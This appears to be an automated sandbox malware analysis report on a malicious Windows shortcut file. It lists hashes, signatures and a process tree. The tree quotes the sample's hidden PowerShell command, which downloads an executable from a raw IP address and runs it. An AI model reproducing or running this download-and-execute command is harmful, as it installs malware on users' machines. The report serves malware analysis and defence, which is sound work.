Analysis
-
max time kernel
14s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
15-01-2025 08:31
Static task
static1
Behavioral task
behavioral1
Sample
SCN-00120258988.lnk
Resource
win7-20241010-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
SCN-00120258988.lnk
Resource
win10v2004-20241007-en
windows10-2004-x64
28 signatures
150 seconds
General
-
Target
SCN-00120258988.lnk
-
Size
2KB
-
MD5
d2f8a24574b8dfff091aceedcbe7422d
-
SHA1
40653d02667f7cbfe38682e131670ee9e13efed2
-
SHA256
3739246e4eef28e6ed8fc6c4ffde9a9d746632756976f08cf6fe14dad8f4b99f
-
SHA512
601b21884e9b6bf801fa9a12e94a688f38aa5dadc1ba6fbdb9ffdb9d078bc8180ebf18fc4bee86890fa34050fef7431550d669810312437154530e0ef97fbc46
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2828 powershell.exe 2828 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2828 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2388 wrote to memory of 2828 2388 cmd.exe 30 PID 2388 wrote to memory of 2828 2388 cmd.exe 30 PID 2388 wrote to memory of 2828 2388 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\SCN-00120258988.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://147.124.216.113/albt.exe -OutFile C:\Users\Admin\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\Admin\AppData\Local\Temp\file.exe' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-